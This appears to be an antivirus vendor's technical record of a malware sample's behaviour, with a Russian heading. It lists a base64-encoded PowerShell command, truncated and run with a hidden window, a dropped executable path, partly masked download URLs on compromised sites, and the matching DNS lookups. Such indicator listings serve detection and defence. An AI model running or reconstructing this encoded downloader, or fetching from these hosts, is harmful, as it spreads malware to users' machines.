Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBADEAZQB6AGUAMwBjAD0AKAAoACcARwAzACcAKwAnAG4ANAA4ACcAKQArACcAMQBsACcAKQA7ACQATABwADEAbwA0AGsAeQA9ACQAUwBfAGsANwBmAGcAYQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIA...
- %HOMEPATH%\lqtz1wv\uptuxug\bgb5aox0.exe
- %HOMEPATH%\lqtz1wv\uptuxug\bgb5aox0.exe
- %HOMEPATH%\lqtz1wv\uptuxug\bgb5aox0.exe
- http://tr#####portrepeat.com/wp-content/0/
- http://we####haveit.com/freeze-columns/KQiSFq7/
- http://tu###hair.com/blog/g3H/
- http://ne####letmall.com/
- http://en###t.co.uk/wp-includes/wdh/
- http://bl##.##temisaritim.com/accuracy-of/z/
- http://ad###enue.net/-/MH6/
- http://wi####elevators.com/avast-premium/S6/
- DNS ASK tr#####portrepeat.com
- DNS ASK we####haveit.com
- DNS ASK tu###hair.com
- DNS ASK ce####onesia.com
- DNS ASK ne####letmall.com
- DNS ASK en###t.co.uk
- DNS ASK bl##.##temisaritim.com
- DNS ASK ad###enue.net
- DNS ASK wi####elevators.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABBADEAZQB6AGUAMwBjAD0AKAAoACcARwAzACcAKwAnAG4ANAA4ACcAKQArACcAMQBsACcAKQA7ACQATABwADEAbwA0AGsAeQA9ACQAUwBfAGsANwBmAGcAYQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIA...' (со скрытым окном)